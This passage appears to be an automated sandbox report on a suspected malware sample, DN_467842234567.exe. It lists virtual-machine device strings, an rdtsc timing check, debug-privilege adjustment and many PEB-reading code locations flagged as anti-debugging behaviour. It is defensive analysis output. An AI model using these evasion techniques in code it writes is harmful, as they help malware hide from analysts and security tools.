Source: explorer.exe, 00000004.00000000.700657795.000000000A897000.00000004.00000001.sdmp Binary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
Enables debug privileges
Source: C:\Users\user\Desktop\DN_467842234567.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WWAHost.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729156EA mov eax, dword ptr fs:[00000030h] 0_2_729156EA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729159AF mov eax, dword ptr fs:[00000030h] 0_2_729159AF
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729158FE mov eax, dword ptr fs:[00000030h] 0_2_729158FE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729159EE mov eax, dword ptr fs:[00000030h] 0_2_729159EE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_72915A2C mov eax, dword ptr fs:[00000030h] 0_2_72915A2C
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBF0BF mov ecx, dword ptr fs:[00000030h] 1_2_00BBF0BF
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBF0BF mov eax, dword ptr fs:[00000030h] 1_2_00BBF0BF
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBF0BF mov eax, dword ptr fs:[00000030h] 1_2_00BBF0BF
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC90AF mov eax, dword ptr fs:[00000030h] 1_2_00BC90AF
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89080 mov eax, dword ptr fs:[00000030h] 1_2_00B89080
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C03884 mov eax, dword ptr fs:[00000030h] 1_2_00C03884
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C03884 mov eax, dword ptr fs:[00000030h] 1_2_00C03884
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B858EC mov eax, dword ptr fs:[00000030h] 1_2_00B858EC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h] 1_2_00B9B02A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h] 1_2_00B9B02A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h] 1_2_00B9B02A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h] 1_2_00B9B02A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h] 1_2_00BB002D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h] 1_2_00BB002D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h] 1_2_00BB002D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h] 1_2_00BB002D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h] 1_2_00BB002D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C51074 mov eax, dword ptr fs:[00000030h] 1_2_00C51074
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C42073 mov eax, dword ptr fs:[00000030h] 1_2_00C42073
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C54015 mov eax, dword ptr fs:[00000030h] 1_2_00C54015
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C54015 mov eax, dword ptr fs:[00000030h] 1_2_00C54015
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h] 1_2_00C07016
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h] 1_2_00C07016
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h] 1_2_00C07016
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA0050 mov eax, dword ptr fs:[00000030h] 1_2_00BA0050
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA0050 mov eax, dword ptr fs:[00000030h] 1_2_00BA0050
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB61A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB61A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB61A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB61A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C141E8 mov eax, dword ptr fs:[00000030h] 1_2_00C141E8
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2990 mov eax, dword ptr fs:[00000030h] 1_2_00BB2990
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAC182 mov eax, dword ptr fs:[00000030h] 1_2_00BAC182
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBA185 mov eax, dword ptr fs:[00000030h] 1_2_00BBA185
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00B8B1E1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00B8B1E1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00B8B1E1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C069A6 mov eax, dword ptr fs:[00000030h] 1_2_00C069A6
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h] 1_2_00C051BE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h] 1_2_00C051BE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h] 1_2_00C051BE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h] 1_2_00C051BE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB513A mov eax, dword ptr fs:[00000030h] 1_2_00BB513A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB513A mov eax, dword ptr fs:[00000030h] 1_2_00BB513A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h] 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h] 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h] 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h] 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov ecx, dword ptr fs:[00000030h] 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h] 1_2_00B89100
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h] 1_2_00B89100
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h] 1_2_00B89100
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B171 mov eax, dword ptr fs:[00000030h] 1_2_00B8B171
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B171 mov eax, dword ptr fs:[00000030h] 1_2_00B8B171
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8C962 mov eax, dword ptr fs:[00000030h] 1_2_00B8C962
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAB944 mov eax, dword ptr fs:[00000030h] 1_2_00BAB944
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAB944 mov eax, dword ptr fs:[00000030h] 1_2_00BAB944
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00B9AAB0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00B9AAB0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBFAB0 mov eax, dword ptr fs:[00000030h] 1_2_00BBFAB0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h] 1_2_00B852A5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h] 1_2_00B852A5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h] 1_2_00B852A5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h] 1_2_00B852A5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h] 1_2_00B852A5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBD294 mov eax, dword ptr fs:[00000030h] 1_2_00BBD294
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBD294 mov eax, dword ptr fs:[00000030h] 1_2_00BBD294
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2AE4 mov eax, dword ptr fs:[00000030h] 1_2_00BB2AE4
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2ACB mov eax, dword ptr fs:[00000030h] 1_2_00BB2ACB
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC4A2C mov eax, dword ptr fs:[00000030h] 1_2_00BC4A2C
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC4A2C mov eax, dword ptr fs:[00000030h] 1_2_00BC4A2C
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4EA55 mov eax, dword ptr fs:[00000030h] 1_2_00C4EA55
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C14257 mov eax, dword ptr fs:[00000030h] 1_2_00C14257
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3B260 mov eax, dword ptr fs:[00000030h] 1_2_00C3B260
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3B260 mov eax, dword ptr fs:[00000030h] 1_2_00C3B260
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA3A1C mov eax, dword ptr fs:[00000030h] 1_2_00BA3A1C
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58A62 mov eax, dword ptr fs:[00000030h] 1_2_00C58A62
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h] 1_2_00B85210
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov ecx, dword ptr fs:[00000030h] 1_2_00B85210
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h] 1_2_00B85210
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h] 1_2_00B85210
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B8AA16
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B8AA16
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B98A0A mov eax, dword ptr fs:[00000030h] 1_2_00B98A0A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC927A mov eax, dword ptr fs:[00000030h] 1_2_00BC927A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4AA16 mov eax, dword ptr fs:[00000030h] 1_2_00C4AA16
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4AA16 mov eax, dword ptr fs:[00000030h] 1_2_00C4AA16
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h] 1_2_00B89240
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h] 1_2_00B89240
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h] 1_2_00B89240
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h] 1_2_00B89240
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C053CA mov eax, dword ptr fs:[00000030h] 1_2_00C053CA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C053CA mov eax, dword ptr fs:[00000030h] 1_2_00C053CA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00BB4BAD
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00BB4BAD
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00BB4BAD
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBB390 mov eax, dword ptr fs:[00000030h] 1_2_00BBB390
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2397 mov eax, dword ptr fs:[00000030h] 1_2_00BB2397
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B91B8F mov eax, dword ptr fs:[00000030h] 1_2_00B91B8F
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B91B8F mov eax, dword ptr fs:[00000030h] 1_2_00B91B8F
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3D380 mov ecx, dword ptr fs:[00000030h] 1_2_00C3D380
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4138A mov eax, dword ptr fs:[00000030h] 1_2_00C4138A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BADBE9 mov eax, dword ptr fs:[00000030h] 1_2_00BADBE9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C55BA5 mov eax, dword ptr fs:[00000030h] 1_2_00C55BA5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58B58 mov eax, dword ptr fs:[00000030h] 1_2_00C58B58
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB3B7A mov eax, dword ptr fs:[00000030h] 1_2_00BB3B7A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB3B7A mov eax, dword ptr fs:[00000030h] 1_2_00BB3B7A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8DB60 mov ecx, dword ptr fs:[00000030h] 1_2_00B8DB60
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4131B mov eax, dword ptr fs:[00000030h] 1_2_00C4131B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8F358 mov eax, dword ptr fs:[00000030h] 1_2_00B8F358
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8DB40 mov eax, dword ptr fs:[00000030h] 1_2_00B8DB40
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58CD6 mov eax, dword ptr fs:[00000030h] 1_2_00C58CD6
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9849B mov eax, dword ptr fs:[00000030h] 1_2_00B9849B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h] 1_2_00C06CF0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h] 1_2_00C06CF0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h] 1_2_00C06CF0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C414FB mov eax, dword ptr fs:[00000030h] 1_2_00C414FB
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1C450 mov eax, dword ptr fs:[00000030h] 1_2_00C1C450
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1C450 mov eax, dword ptr fs:[00000030h] 1_2_00C1C450
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBBC2C mov eax, dword ptr fs:[00000030h] 1_2_00BBBC2C
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h] 1_2_00C5740D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h] 1_2_00C5740D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h] 1_2_00C5740D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h] 1_2_00C06C0A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h] 1_2_00C06C0A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h] 1_2_00C06C0A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h] 1_2_00C06C0A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA746D mov eax, dword ptr fs:[00000030h] 1_2_00BA746D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBA44B mov eax, dword ptr fs:[00000030h] 1_2_00BBA44B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov ecx, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h] 1_2_00C06DC9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00BB1DB5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00BB1DB5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00BB1DB5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB35A1 mov eax, dword ptr fs:[00000030h] 1_2_00BB35A1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBFD9B mov eax, dword ptr fs:[00000030h] 1_2_00BBFD9B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBFD9B mov eax, dword ptr fs:[00000030h] 1_2_00BBFD9B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00C4FDE2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00C4FDE2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00C4FDE2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00C4FDE2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C38DF1 mov eax, dword ptr fs:[00000030h] 1_2_00C38DF1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h] 1_2_00B82D8A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h] 1_2_00B82D8A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h] 1_2_00B82D8A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h] 1_2_00B82D8A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h] 1_2_00B82D8A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h] 1_2_00BB2581
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h] 1_2_00BB2581
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h] 1_2_00BB2581
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h] 1_2_00BB2581
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00B9D5E0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00B9D5E0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C505AC mov eax, dword ptr fs:[00000030h] 1_2_00C505AC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C505AC mov eax, dword ptr fs:[00000030h] 1_2_00C505AC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h] 1_2_00BB4D3B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h] 1_2_00BB4D3B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h] 1_2_00BB4D3B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C03540 mov eax, dword ptr fs:[00000030h] 1_2_00C03540
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8AD30 mov eax, dword ptr fs:[00000030h] 1_2_00B8AD30
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
